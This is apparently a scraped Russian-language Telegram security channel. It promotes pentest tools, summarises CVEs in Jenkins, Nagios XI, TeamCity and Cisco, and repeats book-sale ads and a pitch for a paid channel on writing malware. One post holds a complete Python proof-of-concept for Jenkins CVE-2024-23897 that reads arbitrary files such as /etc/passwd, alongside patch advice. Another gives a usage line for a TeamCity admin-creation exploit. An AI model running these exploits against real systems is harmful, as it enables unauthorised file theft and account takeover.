Hackvertor — еще один инструмент, который выведет работу с Burp Suit на новый уровень.
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Burp #Hackvertor
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Burp #Hackvertor
Please open Telegram to view this post
VIEW IN TELEGRAM
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Jenkins #cve #poc
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Jenkins #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Это умный Tor-краулер с открытым исходным кодом с весьма внушительным функционалом и "мозгами".
Функционал:
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#TorBot #Tor #Bot
Please open Telegram to view this post
VIEW IN TELEGRAM
SQL-injection - одна из популярных и высокоэффективных атак на веб-приложения
Этот инструмент используется для сканирования уязвимостей SQL-инъекции на основе Python, который также может находить уязвимые веб-сайты SQL через Google Dorks.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#SQLiv #SQL #Scan #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#http
Please open Telegram to view this post
VIEW IN TELEGRAM
Miku Miku Beam — это мощный сервер стресс-тестирования, доступный на GitHub
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
👩💻 Nagios XI — RCE
В Nagios XI 2024R1.01 обнаружена уязвимость в компоненте monitoringwizard.php, допускающая аутентифицированную инъекцию SQL (CVE-2024-24401), которая позволяет злоумышленникам создать учетную запись администратора и удаленно выполнить код.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#nagios #sql #exploit
В Nagios XI 2024R1.01 обнаружена уязвимость в компоненте monitoringwizard.php, допускающая аутентифицированную инъекцию SQL (CVE-2024-24401), которая позволяет злоумышленникам создать учетную запись администратора и удаленно выполнить код.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#nagios #sql #exploit
My-arsenal-of-aws-security-tools - это тщательно подобранный список инструментов с открытым исходным кодом для обеспечения безопасности, аудита, криминалистики и реагирования на инциденты AWS.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#AWS #GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE облегчает создание несанкционированной учетной записи администратора в обход ошибок 403 в домене.
*
usage:
python RCity.py -t http://teamcity.com:8111 --verbose
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#teamcity
Please open Telegram to view this post
VIEW IN TELEGRAM
Исправление: Обновление прошивки устройств
Добавления/удаления пользователей и выполнения команд/системных команд
cisco cli
.Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#cisco #rce #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
⚠️ Готовы погрузиться в темную сторону цифрового мира? ⚠️
Добро пожаловать в закрытое сообщество, где мы разбираем сложные CTF-задания , анализируем уникальные самописные вредоносные (ВПО) программы и раскрываем секреты их создания — исключительно в образовательных целях.
🗣 Описание канала
🗣 Вступить 💳🪙
🗣 Вступить ⭐️
🗣 Поддержка
👉 Подписаться 👈
Добро пожаловать в закрытое сообщество, где мы разбираем сложные CTF-задания , анализируем уникальные самописные вредоносные (ВПО) программы и раскрываем секреты их создания — исключительно в образовательных целях.
Статьи опубликованы исключительно в ознакомительных целях.
👉 Подписаться 👈
Please open Telegram to view this post
VIEW IN TELEGRAM
Security
⚠️ Готовы погрузиться в темную сторону цифрового мира? ⚠️ Добро пожаловать в закрытое сообщество, где мы разбираем сложные CTF-задания , анализируем уникальные самописные вредоносные (ВПО) программы и раскрываем секреты их создания — исключительно в образовательных…
Платежный шлюз восстановлен, извиняемся за неудобства.
Благодаря мониторингу и обнаружению угроз в режиме реального времени он обеспечивает безопасность ваших систем, обеспечивая при этом чистую и удобную для пользователя панель управления.
👉 Подписаться 👈
#SSH #Scan
Please open Telegram to view this post
VIEW IN TELEGRAM
WhatWeb - это сканер, написанный на языке Ruby, который может идентифицировать и распознать все веб-технологии, доступные на целевом веб-сайте.
👉 Подписаться 👈
#Web #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Ffuf — это мощный инструмент командной строки, предназначенный для перебора содержимого веб-приложений.
👉 Подписаться 👈
#Brute #Web
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Обфускация Bash
Bashfuscator – это модульный и расширяемый фреймворк для обфускации Bash, написанный на языке Python 3. Он предоставляет множество различных способов сделать однострочные фразы или скрипты Bash гораздо более сложными для понимания. Это достигается за счет…
👉 Подписаться 👈
#VoIP #sip
Please open Telegram to view this post
VIEW IN TELEGRAM
CVEScannerV2 - усовершенствованный скрипт Nmap, предназначенный для обнаружения потенциальных уязвимостей в сетевых сервисах.
➖Результатом является сканирование, которое не только отображает вашу сеть, но и выделяет потенциальные слабые места безопасности в режиме реального времени.
🎃 Вступить в закрытый канал 🎃
🗣 Описание
👉 Подписаться 👈
#Nmap #Scanning
➖Результатом является сканирование, которое не только отображает вашу сеть, но и выделяет потенциальные слабые места безопасности в режиме реального времени.
👉 Подписаться 👈
#Nmap #Scanning
Please open Telegram to view this post
VIEW IN TELEGRAM